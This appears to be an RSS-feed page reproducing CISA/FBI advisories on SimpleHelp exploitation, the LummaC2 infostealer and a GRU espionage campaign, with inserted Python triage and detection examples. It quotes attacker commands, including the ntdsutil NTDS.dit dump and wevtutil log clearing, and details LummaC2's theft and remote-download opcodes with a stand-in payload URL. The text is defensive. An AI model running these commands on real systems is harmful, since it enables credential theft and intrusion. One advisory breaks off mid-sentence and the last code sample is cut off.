RSS feed

Secondary sources
65 RSS articles
Ransomware Actors Exploit Unpatched SimpleHelp Remote Monitoring and Management to Compromise Utility Billing Software Provider
Governance & Regulation | US-CERT Alerts | 289 days ago

Summary

The Cybersecurity and Infrastructure Security Agency (CISA) is releasing this advisory in response to ransomware actors leveraging unpatched instances of a vulnerability in SimpleHelp Remote Monitoring and Management (RMM) to compromise customers of a utility billing software provider. This incident reflects a broader pattern of ransomware actors targeting organizations through unpatched versions of SimpleHelp RMM since January 2025.

SimpleHelp versions 5.5.7 and earlier contain several vulnerabilities, including CVE-2024-57727, a path traversal vulnerability. [1] Ransomware actors likely leveraged CVE-2024-57727 to access downstream customers' unpatched SimpleHelp RMM for disruption of services in double extortion compromises. [1] CISA added CVE-2024-57727 to its Known Exploited Vulnerabilities (KEV) Catalog on Feb. 13, 2025.

CISA urges software vendors, downstream customers, and end users to immediately implement the Mitigations listed in this advisory based on confirmed compromise or risk of compromise.

Download the PDF version of this report: AA25-163A Ransomware Actors Exploit Unpatched SimpleHelp Remote Monitoring and Management to Compromise Utility Billing Software Provider (PDF, 420.49 KB)

Mitigations

CISA recommends organizations implement the mitigations below to respond to emerging ransomware activity exploiting SimpleHelp software. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA's CPGs webpage for more information on the CPGs, including additional recommended baseline protections.
These mitigations apply to all critical infrastructure organizations.

Vulnerable Third-Party Vendors

If SimpleHelp is embedded or bundled in vendor-owned software, or if a third-party service provider leverages SimpleHelp on a downstream customer's network, identify the SimpleHelp server version at the top of the file /SimpleHelp/configuration/serverconfig.xml. If version 5.5.7 or prior is found or has been used since January 2025, third-party vendors should:
- Isolate the SimpleHelp server instance from the internet or stop the server process.
- Upgrade immediately to the latest SimpleHelp version in accordance with SimpleHelp's security vulnerability advisory. [2]
- Contact your downstream customers to direct them to take actions to secure their endpoints and undertake threat hunting actions on their network.

Vulnerable Downstream Customers and End Users

Determine if the system is running an unpatched version of SimpleHelp RMM, either directly or embedded in third-party software.

SimpleHelp Endpoints

Determine if an endpoint is running the remote access (RAS) service by checking the following paths, depending on the specific environment:
- Windows: %APPDATA%\JWrapper-Remote Access
- Linux: /opt/JWrapper-Remote Access
- macOS: /Library/Application Support/JWrapper-Remote Access

If a RAS installation is present and running, open the serviceconfig.xml file in /JWrapper-Remote Access/JWAppsSharedConfig/ to determine if the registered service is vulnerable. The lines starting with
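One way to script the server version check described above against a copy of serverconfig.xml, as an added example that is not part of the CISA advisory: it assumes only that a dotted three-part version string appears within the first few lines of the file (the advisory does not document the file's layout) and compares versions numerically so that 5.5.10 is treated as newer than 5.5.7; the sample file bodies are constructed.

```python
import re
from typing import Optional, Tuple

# Advisory threshold: SimpleHelp 5.5.7 and earlier are affected.
AFFECTED_MAX = (5, 5, 7)

# ASSUMPTION: the advisory says the server version sits at the top of
# /SimpleHelp/configuration/serverconfig.xml but does not document the file
# layout, so this takes the first dotted three-part version string found in
# the first few lines. "1.0" in the XML declaration has only two parts and
# is therefore ignored.
VERSION_RE = re.compile(r"\b(\d+)\.(\d+)\.(\d+)\b")


def parse_version(text: str, max_lines: int = 10) -> Optional[Tuple[int, int, int]]:
    """Return the first x.y.z version near the top of the file as an int tuple."""
    for line in text.splitlines()[:max_lines]:
        m = VERSION_RE.search(line)
        if m:
            return (int(m.group(1)), int(m.group(2)), int(m.group(3)))
    return None


def is_affected(version: Tuple[int, int, int]) -> bool:
    """Numeric tuple comparison: 5.5.10 is newer than 5.5.7, which a plain
    string comparison ("5.5.10" < "5.5.7") would get wrong."""
    return version <= AFFECTED_MAX


def triage_server_config(text: str) -> dict:
    """Classify a serverconfig.xml body as affected, patched or unknown."""
    v = parse_version(text)
    if v is None:
        return {"version": None, "status": "unknown"}
    return {
        "version": ".".join(str(n) for n in v),
        "status": "affected" if is_affected(v) else "patched",
    }


# Constructed sample bodies; these are not real SimpleHelp files.
SAMPLE_OLD = '<?xml version="1.0"?>\n<serverconfig version="5.5.7">\n</serverconfig>\n'
SAMPLE_NEW = '<?xml version="1.0"?>\n<serverconfig version="5.5.10">\n</serverconfig>\n'
SAMPLE_NO_VERSION = '<?xml version="1.0"?>\n<serverconfig>\n</serverconfig>\n'

if __name__ == "__main__":
    for name, body in (("old", SAMPLE_OLD), ("new", SAMPLE_NEW), ("none", SAMPLE_NO_VERSION)):
        print(name, triage_server_config(body))
```

A "patched" result only describes the current file; the advisory also treats any server that ran 5.5.7 or earlier since January 2025 as in scope, which needs upgrade history rather than this check.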

Threat Actors Deploy LummaC2 Malware to Exfiltrate Sensitive Data from Organizations
Governance & Regulation | US-CERT Alerts | 312 days ago

Summary

The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint advisory to disseminate known tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) associated with threat actors deploying the LummaC2 information stealer (infostealer) malware. LummaC2 malware is able to infiltrate victim computer networks and exfiltrate sensitive information, threatening vulnerable individuals' and organizations' computer networks across multiple U.S. critical infrastructure sectors. According to FBI information and trusted third-party reporting, this activity has been observed as recently as May 2025. The IOCs included in this advisory were associated with LummaC2 malware infections from November 2023 through May 2025.

The FBI and CISA encourage organizations to implement the recommendations in the Mitigations section of this advisory to reduce the likelihood and impact of LummaC2 malware.

Download the PDF version of this report: AA25-141B Threat Actors Deploy LummaC2 Malware to Exfiltrate Sensitive Data from Organizations (PDF, 1.28 MB)

For a downloadable copy of IOCs, see:
- AA25-141B STIX XML (XML, 146.54 KB)
- AA25-141B STIX JSON (JSON, 300.90 KB)

Technical Details

Note: This advisory uses the MITRE ATT&CK Matrix for Enterprise framework, version 17. See the MITRE ATT&CK Tactics and Techniques section of this advisory for threat actor activity mapped to MITRE ATT&CK tactics and techniques.

Overview

LummaC2 malware first appeared for sale on multiple Russian-language cybercriminal forums in 2022. Threat actors frequently use spearphishing hyperlinks and attachments to deploy LummaC2 malware payloads [T1566.001, T1566.002]. Additionally, threat actors rely on unsuspecting users to execute the payload by clicking a fake Completely Automated Public Turing Test to tell Computers and Humans Apart (CAPTCHA).
The CAPTCHA contains instructions for users to then open the Windows Run window (Windows key + R) and paste clipboard contents (CTRL + V). After users press Enter, a subsequent Base64-encoded PowerShell process is executed.

To obfuscate their operations, threat actors have embedded and distributed LummaC2 malware within spoofed or fake popular software (e.g., multimedia player or utility software) [T1036]. The malware's obfuscation methods allow LummaC2 actors to bypass standard cybersecurity measures, such as Endpoint Detection and Response (EDR) solutions or antivirus programs, designed to flag common phishing attempts or drive-by downloads [T1027]. Once a victim's computer system is infected, the malware can exfiltrate sensitive user information, including personally identifiable information, financial credentials, cryptocurrency wallets, browser extensions, and multifactor authentication (MFA) details, without immediate detection [TA0010, T1119].

Private sector statistics indicate there were more than 21,000 market listings selling LummaC2 logs on multiple cybercriminal forums from April through June of 2024, a 71.7 percent increase from April through June of 2023.

File Execution

Upon execution, the LummaC2.exe file will enter its main routine, which includes four sub-routines (see Figure 1).

Figure 1. LummaC2 Main Routine

The first routine decrypts strings for a message box that is displayed to the user (see Figure 2).

Figure 2. Message Box

If the user selects No, the malware will exit. If the user selects Yes, the malware will move on to its next routine, which decrypts its callback Command and Control (C2) domains [T1140]. A list of observed domains is included in the Indicators of Compromise section. After each domain is decoded, the implant will attempt a POST request [T1071.001] (see Figure 3).

Figure 3. Post Request

If the POST request is successful, a pointer to the decoded domain string is saved in a global variable for later use in the main C2 routine, which retrieves JSON-formatted commands (see Figure 4).

Figure 4. Code Saving Successful Callback Request

Once a valid C2 domain is contacted and saved, the malware moves on to the next routine, which queries the user's name and computer name using the Application Programming Interfaces (APIs) GetUserNameW and GetComputerNameW respectively [T1012]. The returned data is then hashed and compared against a hard-coded hash value (see Figure 5).

Figure 5. User and Computer Name Check

The hashing routine was not identified as a standard algorithm; however, it is a simple routine that converts a Unicode string to a 32-bit hexadecimal value. If the username hash is equal to the value 0x56CF7626, then the computer name is queried. If the queried computer name is seven characters long, then the name is hashed and checked against the hard-coded value of 0xB09406C7. If both values match, a final subroutine will be called with a static value of the computer name hash as an argument. If this routine is reached, the process will terminate. This is most likely a failsafe to prevent the malware from running on the attacker's system, as its algorithms are one-way only and will not reveal details of the attacker's own hostname and username.

If the username and hostname check function returns zero (does not match the hard-coded values), the malware will enter its main callback routine. The LummaC2 malware will contact the saved hostname from the previous check and send the following POST request (see Figure 6).

Figure 6. Second POST Request

The data returned from the C2 server is encrypted. Once decoded, the C2 data is in a JSON format and is parsed by the LummaC2 malware.
The C2 uses the JSON configuration to parse its browser extensions and target lists using the ex key, which contains an array of objects (see Figure 7).

Figure 7. Parsing of ex JSON Value

The c key contains an array of objects; parsing it gives the implant its C2 instructions (see Figure 8).

Figure 8. Parsing of c JSON Value

C2 Instructions

Each array object that contains the JSON key t will be evaluated as a command opcode, resulting in the C2 instructions in the subsections below.

1. Opcode 0 – Steal Data Generic

This command allows five fields to be defined when stealing data, offering the most flexibility. The Opcode 0 command option allows LummaC2 affiliates to add their custom information gathering details (see Table 1).

Table 1. Opcode 0 Options
Key | Value
p | Path to steal from
m | File extensions to read
z | Output directory to store stolen data
d | Depth of recursiveness
fs | Maximum file size

2. Opcode 1 – Steal Browser Data

This command only allows for two options: a path and the name of the output directory. Based on sample configuration downloads, this command is used for browser data theft for everything except Mozilla [T1217] (see Table 2).

Table 2. Opcode 1 Options
Key | Value
p | Path to steal from
z | Name of Browser – Output

3. Opcode 2 – Steal Browser Data (Mozilla)

This command is identical to Opcode 1; however, this option seems to be utilized solely for Mozilla browser data (see Table 3).

Table 3. Opcode 2 Options
Key | Value
p | Path to steal from
z | Name of Browser – Output

4. Opcode 3 – Download a File

This command contains three options: a URL, file extension, and execution type. The configuration can specify a remote file with u to download and create the extension specified in the ft key [T1105] (see Table 4).

Table 4. Opcode 3 Options
Key | Value
u | URL for Download
ft | File Extension
e | Execution Type

The e value can take two values: 0 or 1.
This specifies how to execute the downloaded file, either with the LoadLibrary API or via the command line with rundll32.exe [T1106] (see Table 5).

Table 5. Execution Types
Key | Value
e=0 | Execute with LoadLibraryW()
e=1 | Execute with rundll32.exe

5. Take Screenshot

If the configuration JSON file has a key of "se" and its value is "true," the malware will take a screenshot in BMP format and upload it to the C2 server.

6. Delete Self

If the configuration JSON file has a key of "ad" and its value is "true," the malware will enter a routine to delete itself. The command shown in Figure 9 will be decoded and executed for self-deletion.

Figure 9. Self-Deletion Command Line

Figure 10 depicts the above command line during execution.

Figure 10. Decoded Command Line in Memory

Host Modifications

Without any C2 interactions, the LummaC2 malware does not create any files on the infected drive. It simply runs in memory, gathers system information, and exfiltrates it to the C2 server [T1082]. The commands returned from the C2 server could cause it to drop additional files and/or save data to files on the local hard drive. This is variable, as these commands come from the C2 server and are mutable.

Decrypted Strings

Below is a list of hard-coded decrypted strings located in the binary (see Figure 11).

Figure 11. Decoded Strings

Indicators of Compromise

See Table 6 and Table 7 for LummaC2 IOCs obtained by the FBI and trusted third parties. Disclaimer: The authoring agencies recommend organizations investigate and vet these indicators of compromise prior to taking action, such as blocking.

Table 6. LummaC2 Executable Hashes

Table 7. LummaC2 DLL Binaries
DLL Binaries | Type
iphlpapi.dll | IP Helper API
winhttp.dll | Windows HTTP Services

The following are domains observed deploying LummaC2 malware. Disclaimer: The domains below are historical in nature and may not currently be malicious.
MITRE ATT&CK Tactics and Techniques

See Table 8 through Table 13 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK's Best Practices for MITRE ATT&CK Mapping and CISA's Decider Tool.

Table 8. Initial Access
Technique Title | ID | Use
Phishing | T1566 | Threat actors delivered LummaC2 malware through phishing emails.
Phishing: Spearphishing Attachment | T1566.001 | Threat actors used spearphishing attachments to deploy LummaC2 malware payloads.
Phishing: Spearphishing Link | T1566.002 | Threat actors used spearphishing hyperlinks to deploy LummaC2 malware payloads.

Table 9. Defense Evasion
Technique Title | ID | Use
Obfuscated Files or Information | T1027 | Threat actors obfuscated the malware to bypass standard cybersecurity measures designed to flag common phishing attempts or drive-by downloads.
Masquerading | T1036 | Threat actors delivered LummaC2 malware via spoofed software.
Deobfuscate/Decode Files or Information | T1140 | Threat actors used LummaC2 malware to decrypt its callback C2 domains.

Table 10. Discovery
Technique Title | ID | Use
Query Registry | T1012 | Threat actors used LummaC2 malware to query the user's name and computer name utilizing the APIs GetUserNameW and GetComputerNameW.
Browser Information Discovery | T1217 | Threat actors used LummaC2 malware to steal browser data.

Table 11. Collection
Technique Title | ID | Use
Automated Collection | T1119 | LummaC2 malware has automated collection of various information including cryptocurrency wallet details.

Table 12. Command and Control
Technique Title | ID | Use
Application Layer Protocol: Web Protocols | T1071.001 | Threat actors used LummaC2 malware to attempt POST requests.
Ingress Tool Transfer | T1105 | Threat actors used LummaC2 malware to transfer a remote file to compromised systems.

Table 13. Exfiltration
Technique Title | ID | Use
Exfiltration | TA0010 | Threat actors used LummaC2 malware to exfiltrate sensitive user information, including traditional credentials, cryptocurrency wallets, browser extensions, and MFA details without immediate detection.
Native API | T1106 | Threat actors used LummaC2 malware to download files with native OS APIs.

Mitigations

The FBI and CISA recommend organizations implement the mitigations below to reduce the risk of compromise by LummaC2 malware. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA's CPGs webpage for more information on the CPGs, including additional recommended baseline protections.

These mitigations apply to all critical infrastructure organizations.

- Separate User and Privileged Accounts: Allow only necessary users and applications access to the registry [CPG 2.E].
- Monitor and detect suspicious behavior during exploitation [CPG 3.A]. Monitor and detect suspicious behavior, creation and termination events, and unusual and unexpected processes running. Monitor API calls that may attempt to retrieve system information. Analyze behavior patterns from process activities to identify anomalies. For more information, visit CISA's guidance on Enhanced Visibility and Hardening Guidance for Communications Infrastructure.
- Implement application controls to manage and control execution of software, including allowlisting remote access programs. Application controls should prevent installation and execution of portable versions of unauthorized remote access and other software.
  A properly configured application allowlisting solution will block any unlisted application execution. Allowlisting is important because antivirus solutions may fail to detect the execution of malicious portable executables when the files use any combination of compression, encryption, or obfuscation.
- Protect against threat actor phishing campaigns by implementing CISA's Phishing Guidance and phishing-resistant multifactor authentication [CPG 2.H].
- Log Collection: Regularly monitoring and reviewing registry changes and access logs can support detection of LummaC2 malware [CPG 2.T].
- Implement authentication, authorization, and accounting (AAA) systems [M1018] to limit actions users can perform and review logs of user actions to detect unauthorized use and abuse.
- Apply principles of least privilege to user accounts and groups, allowing only the performance of authorized actions.
- Audit user accounts and revoke credentials for departing employees, removing those that are inactive or unnecessary on a routine basis [CPG 2.D].
- Limit the ability for user accounts to create additional accounts.
- Keep systems up to date with regular updates, patches, hot fixes, and service packs that may minimize vulnerabilities. Learn more by visiting CISA's webpage: Secure Our World, Update Software.
- Secure network devices to restrict command line access. Learn more about defending against the malicious use of remote access software by visiting CISA's Guide to Securing Remote Access Software.
- Use segmentation to prevent access to sensitive systems and information, possibly with the use of Demilitarized Zone (DMZ) or virtual private cloud (VPC) instances to isolate systems [CPG 2.F].
- Monitor and detect API usage, looking for unusual or malicious behavior.
Validate Security Controls

In addition to applying mitigations, the FBI and CISA recommend exercising, testing, and validating your organization's security program against threat behaviors mapped to the MITRE ATT&CK Matrix for Enterprise framework in this advisory. The FBI and CISA recommend testing your existing security controls inventory to assess performance against the ATT&CK techniques described in this advisory.

To get started:
1. Select an ATT&CK technique described in this advisory (see Table 8 through Table 13).
2. Align your security technologies against the technique.
3. Test your technologies against the technique.
4. Analyze your detection and prevention technologies' performance.
5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

The FBI and CISA recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

Reporting

Your organization has no obligation to respond or provide information to the FBI in response to this joint advisory. If, after reviewing the information provided, your organization decides to provide information to the FBI, reporting must be consistent with applicable state and federal laws. The FBI is interested in any information that can be shared, including the status and scope of infection, estimated loss, date of infection, date detected, initial attack vector, and host- and network-based indicators. To report information, please contact the FBI's Internet Crime Complaint Center (IC3), your local FBI field office, or CISA's 24/7 Operations Center at report@cisa.gov or (888) 282-0870.

Disclaimer

The information in this report is being provided "as is" for informational purposes only.
The FBI and CISA do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favor by the FBI and CISA.

Acknowledgements

ReliaQuest contributed to this advisory.

Version History

May 21, 2025: Initial version.
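An added example, not from the advisory or the FBI/CISA, showing how an analyst can summarise a decoded LummaC2 C2 JSON blob using the opcode and key semantics given under C2 Instructions above (t, p, m, z, d, fs, u, ft, e, se, ad). The sample configuration is constructed, and the ex entries are left opaque because the advisory does not describe their fields.

```python
import json

# Opcode semantics and option keys as described under C2 Instructions.
OPCODES = {
    0: ("steal data (generic)", {"p": "path", "m": "extensions", "z": "output dir",
                                 "d": "depth", "fs": "max file size"}),
    1: ("steal browser data", {"p": "path", "z": "browser/output name"}),
    2: ("steal browser data (Mozilla)", {"p": "path", "z": "browser/output name"}),
    3: ("download a file", {"u": "url", "ft": "file extension", "e": "execution type"}),
}
# Table 5: how a downloaded file is executed.
EXEC_TYPES = {0: "LoadLibraryW()", 1: "rundll32.exe"}


def describe_command(obj: dict) -> str:
    """Render one object carrying the opcode key 't' as an analyst-readable line."""
    op = obj.get("t")
    if op not in OPCODES:
        return f"opcode {op!r}: not described in the advisory, raw={obj}"
    name, keys = OPCODES[op]
    fields = []
    for key, label in keys.items():
        if key in obj:
            val = obj[key]
            if key == "e":
                val = f"{val} ({EXEC_TYPES.get(val, 'unrecognised')})"
            fields.append(f"{label}={val}")
    return f"opcode {op}: {name}; " + ", ".join(fields)


def _flag_set(value) -> bool:
    # The advisory quotes the value as "true"; accept the JSON boolean and the string.
    return value is True or value == "true"


def triage_config(config_json: str) -> dict:
    """Summarise a decoded C2 JSON blob: tasking, flags and number of ex entries."""
    cfg = json.loads(config_json)
    # Only objects in the c array that carry a t key are evaluated as commands.
    commands = [describe_command(o) for o in cfg.get("c", [])
                if isinstance(o, dict) and "t" in o]
    flags = []
    if _flag_set(cfg.get("se")):
        flags.append("screenshot (BMP) requested")
    if _flag_set(cfg.get("ad")):
        flags.append("self-deletion requested")
    return {"commands": commands, "flags": flags, "ex_entries": len(cfg.get("ex", []))}


# Constructed sample configuration, not a captured one. The ex objects are left
# empty because the advisory does not describe their fields.
SAMPLE_CONFIG = json.dumps({
    "ex": [{}, {}],
    "c": [
        {"t": 0, "p": "%USERPROFILE%\\Documents", "m": "*.txt,*.pdf", "z": "docs", "d": 2, "fs": 2048},
        {"t": 1, "p": "%LOCALAPPDATA%\\Google\\Chrome\\User Data", "z": "Chrome"},
        {"t": 2, "p": "%APPDATA%\\Mozilla\\Firefox\\Profiles", "z": "Firefox"},
        {"t": 3, "u": "https://example.invalid/stage2", "ft": "dll", "e": 1},
        {"note": "an object without t is not evaluated as a command"},
    ],
    "se": True,
    "ad": "false",
})

if __name__ == "__main__":
    summary = triage_config(SAMPLE_CONFIG)
    for line in summary["commands"] + summary["flags"]:
        print(line)
```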

Russian GRU Targeting Western Logistics Entities and Technology Companies
Governance & Regulation | US-CERT Alerts | 320 days ago

Executive Summary

This joint cybersecurity advisory (CSA) highlights a Russian state-sponsored cyber campaign targeting Western logistics entities and technology companies. This includes those involved in the coordination, transport, and delivery of foreign assistance to Ukraine. Since 2022, Western logistics entities and IT companies have faced an elevated risk of targeting by the Russian General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (85th GTsSS), military unit 26165, tracked in the cybersecurity community under several names (see "Cybersecurity Industry Tracking"). The actors' cyber espionage-oriented campaign, targeting technology companies and logistics entities, uses a mix of previously disclosed tactics, techniques, and procedures (TTPs). The authoring agencies expect similar targeting and TTP use to continue.

Executives and network defenders at logistics entities and technology companies should recognize the elevated threat of unit 26165 targeting, increase monitoring and threat hunting for known TTPs and indicators of compromise (IOCs), and posture network defenses with a presumption of targeting.

This cyber espionage-oriented campaign targeting logistics entities and technology companies uses a mix of previously disclosed TTPs and is likely connected to these actors' wide-scale targeting of IP cameras in Ukraine and bordering NATO nations.
The following authors and co-sealers are releasing this CSA:
- United States National Security Agency (NSA)
- United States Federal Bureau of Investigation (FBI)
- United Kingdom National Cyber Security Centre (NCSC-UK)
- Germany Federal Intelligence Service (BND), Bundesnachrichtendienst
- Germany Federal Office for Information Security (BSI), Bundesamt für Sicherheit in der Informationstechnik
- Germany Federal Office for the Protection of the Constitution (BfV), Bundesamt für Verfassungsschutz
- Czech Republic Military Intelligence (VZ), Vojenské zpravodajství
- Czech Republic National Cyber and Information Security Agency (NÚKIB), Národní úřad pro kybernetickou a informační bezpečnost
- Czech Republic Security Information Service (BIS), Bezpečnostní informační služba
- Poland Internal Security Agency (ABW), Agencja Bezpieczeństwa Wewnętrznego
- Poland Military Counterintelligence Service (SKW), Służba Kontrwywiadu Wojskowego
- United States Cybersecurity and Infrastructure Security Agency (CISA)
- United States Department of Defense Cyber Crime Center (DC3)
- United States Cyber Command (USCYBERCOM)
- Australian Signals Directorate's Australian Cyber Security Centre (ASD's ACSC)
- Canadian Centre for Cyber Security (CCCS)
- Danish Defence Intelligence Service (DDIS), Forsvarets Efterretningstjeneste
- Estonian Foreign Intelligence Service (EFIS), Välisluureamet
- Estonian National Cyber Security Centre (NCSC-EE), Küberturvalisuse keskus
- French Cybersecurity Agency (ANSSI), Agence nationale de la sécurité des systèmes d'information
- Netherlands Defence Intelligence and Security Service (MIVD), Militaire Inlichtingen- en Veiligheidsdienst

Download the PDF version of this report: Russian GRU Targeting Western Logistics Entities and Technology Companies (PDF, 1,081 KB)

For a downloadable list of IOCs, visit:
- AA25-141A STIX XML (XML, 117.02 KB)
- AA25-141A STIX JSON (JSON, 144.29 KB)

Introduction

For over two years, the Russian GRU 85th GTsSS, military unit 26165, commonly known in the cybersecurity community as APT28, Fancy Bear, Forest Blizzard, BlueDelta, and a variety of other identifiers, has conducted this campaign using a mix of known tactics, techniques, and procedures (TTPs), including reconstituted password spraying capabilities, spearphishing, and modification of Microsoft Exchange mailbox permissions. In late February 2022, multiple Russian state-sponsored cyber actors increased the variety of cyber operations for purposes of espionage, destruction, and influence, with unit 26165 predominantly involved in espionage. [1] As Russian military forces failed to meet their military objectives and Western countries provided aid to support Ukraine's territorial defense, unit 26165 expanded its targeting of logistics entities and technology companies involved in the delivery of aid. These actors have also targeted Internet-connected cameras at Ukrainian border crossings to monitor and track aid shipments.

Note: This advisory uses the MITRE ATT&CK for Enterprise framework, version 17. See Appendix A: MITRE ATT&CK tactics and techniques for a table of the threat actors' activity mapped to MITRE ATT&CK tactics and techniques. This advisory uses the MITRE D3FEND framework, version 1.0.

Description of Targets

The GRU unit 26165 cyber campaign against Western logistics providers and technology companies has targeted dozens of entities, including government organizations and private/commercial entities across virtually all transportation modes: air, sea, and rail. These actors have targeted entities associated with the following verticals within NATO member states, Ukraine, and at international organizations:
- Defense Industry
- Transportation and Transportation Hubs (ports, airports, etc.)
- Maritime
- Air Traffic Management
- IT Services

In the course of the targeting lifecycle, unit 26165 actors identified and conducted follow-on targeting of additional entities in the transportation sector that had business ties to the primary target, exploiting trust relationships to attempt to gain additional access [T1199]. The actors also conducted reconnaissance on at least one entity involved in the production of industrial control system (ICS) components for railway management, though a successful compromise was not confirmed [TA0043].

The countries with targeted entities include the following, as illustrated in Figure 1:
- Bulgaria
- Czech Republic
- France
- Germany
- Greece
- Italy
- Moldova
- Netherlands
- Poland
- Romania
- Slovakia
- Ukraine
- United States

Figure 1: Countries with Targeted Entities

Initial Access TTPs

To gain initial access to targeted entities, unit 26165 actors used several techniques, including (but not limited to):
- Credential guessing [T1110.001] / brute force [T1110.003]
- Spearphishing for credentials [T1566]
- Spearphishing delivering malware [T1566]
- Outlook NTLM vulnerability (CVE-2023-23397)
- Roundcube vulnerabilities (CVE-2020-12641, CVE-2020-35730, CVE-2021-44026)
- Exploitation of Internet-facing infrastructure, including corporate VPNs [T1133], via public vulnerabilities and SQL injection [T1190]
- Exploitation of WinRAR vulnerability (CVE-2023-38831)

The actors abused vulnerabilities associated with a range of brands and models of small office/home office (SOHO) devices to facilitate covert cyber operations, as well as to proxy malicious activity via devices with geolocation in proximity to the target [T1665]. [2]

Credential Guessing/Brute Force

Unit 26165 actors' credential guessing [T1110.001] operations in this campaign exhibit some characteristics similar to those disclosed in the previous CSA "Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments." [3] Based on victim network investigations, the current iteration of this TTP employs a similar blend of anonymization infrastructure, including the use of Tor and commercial VPNs [T1090.003]. The actors frequently rotated the IP addresses used to further hamper detection. All observed connections were made via encrypted TLS [T1573].

Spearphishing

GRU unit 26165 actors' spearphishing emails included links [T1566.002] leading to fake login pages impersonating a variety of government entities and Western cloud email providers' webpages. These webpages were typically hosted on free third-party services or compromised SOHO devices and often used legitimate documents associated with thematically similar entities as lures. The subjects of spearphishing emails were diverse and ranged from professional topics to adult themes. Phishing emails were frequently sent via compromised accounts or free webmail accounts [T1586.002, T1586.003]. The emails were typically written in the target's native language and sent to a single targeted recipient.

Some campaigns employed multi-stage redirectors [T1104] verifying IP geolocation [T1627.001] and browser fingerprints [T1627] to protect credential harvesting infrastructure or to provide multifactor authentication (MFA) [T1111] and CAPTCHA relaying capabilities [T1056]. Connecting endpoints failing the location checks were redirected to a benign URL [T1627], such as msn.com.
Redirector services used include:

- Webhook[.]site
- FrgeIO
- InfinityFree
- Dynu
- Mocky
- Pipedream
- Mockbin[.]org

The actors also used spearphishing to deliver malware (including HEADLACE and MASEPIE) as executables [T1204.002] delivered via third-party services and redirectors [T1566.002], as scripts in a mix of languages [T1059] (including BAT [T1059.003] and VBScript [T1059.005]), and as links to hosted shortcuts [T1204.001].

CVE Usage

Throughout this campaign, GRU unit 26165 weaponized an Outlook NTLM vulnerability (CVE-2023-23397) to collect NTLM hashes and credentials via specially crafted Outlook calendar appointment invitations [T1187]. [4],[5] These actors also used a series of Roundcube CVEs (CVE-2020-12641, CVE-2020-35730, and CVE-2021-44026) to execute arbitrary shell commands [T1059], gain access to victim email accounts, and retrieve sensitive data from email servers [T1114].

Since at least fall 2023, the actors have leveraged a WinRAR vulnerability (CVE-2023-38831), which allows execution of arbitrary code embedded in an archive, as a means of initial access [T1659]. The actors sent emails with malicious attachments [T1566.001] or embedded hyperlinks [T1566.002] that downloaded a malicious archive prepared using this CVE.

Post-Compromise TTPs

After an initial compromise using one of the above techniques, unit 26165 actors conducted contact information reconnaissance to identify additional targets in key positions [T1589.002]. The actors also conducted reconnaissance of the cybersecurity department [T1591], individuals responsible for coordinating transport [T1591.004], and other companies cooperating with the victim entity [T1591.002].

The actors used native commands and open source tools, such as Impacket and PsExec, to move laterally within the environment [TA0008]. Multiple Impacket scripts were used as .exe files, in addition to the Python versions, depending on the victim environment.
The actors also moved laterally within the network using Remote Desktop Protocol (RDP) [T1021.001] to access additional hosts and attempted to dump Active Directory NTDS.dit domain databases [T1003.003] using native Active Directory Domain Services commands, such as the one in Figure 2.

Figure 2: Example Active Directory Domain Services command

    C:\Windows\system32\ntdsutil.exe "activate instance ntds" ifm "create full C:\temp\[a-z]{3}" quit quit

Additionally, GRU unit 26165 actors used the tools Certipy and ADExplorer.exe to exfiltrate information from Active Directory. The actors installed Python [T1059.006] on infected machines to enable the execution of Certipy. Accessed files were archived in .zip files prior to exfiltration [T1560]. The actors attempted to exfiltrate archived data via a previously dropped OpenSSH binary [T1048].

Incident response investigations revealed that the actors would take steps to locate and exfiltrate lists of Office 365 users and set up sustained email collection. The actors manipulated mailbox permissions [T1098.002] to establish sustained email collection at compromised logistics entities, as detailed in a Polish Cyber Command blog. [6] After initial authentication, unit 26165 actors would change accounts' folder permissions and enroll compromised accounts in MFA mechanisms to increase the trust level of compromised accounts and enable sustained access [T1556.006].

The actors leveraged Python scripts to retrieve plaintext passwords via Group Policy Preferences [T1552.006] using Get-GPPPassword.py, and a modified ldap-dump.py to enumerate the Windows environment [T1087.002] and conduct a brute force password spray [T1110.003] via Lightweight Directory Access Protocol (LDAP). The actors would additionally delete event logs through the wevtutil utility [T1070.001].
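As an added example (not code from the advisory), the Python below scans constructed process-creation events for the command lines described in this section (the ntdsutil IFM dump, wevtutil log clearing, schtasks XML imports, background ssh -Nf, the GPP password script, headless Edge) and correlates dump-then-clear activity per host so that a single living-off-the-land binary does not fire on its own. The one-line event format, host names and command arguments are assumptions.

```python
import re
from dataclasses import dataclass

# Constructed process-creation events in a hypothetical one-line format
# ("<time> host=<host> user=<user> cmd=<command line>"); not real telemetry.
# The command lines mirror the post-compromise TTPs described in the advisory.
SAMPLE_EVENTS = """\
2024-07-02T09:14:03Z host=DC01 user=CORP\\svc_backup cmd=C:\\Windows\\system32\\ntdsutil.exe "activate instance ntds" ifm "create full C:\\temp\\xyz" quit quit
2024-07-02T09:20:11Z host=DC01 user=CORP\\svc_backup cmd=wevtutil.exe cl Security
2024-07-02T09:25:44Z host=WS17 user=CORP\\jdoe cmd=msedge.exe --headless=new --disable-gpu https://example.invalid/lure
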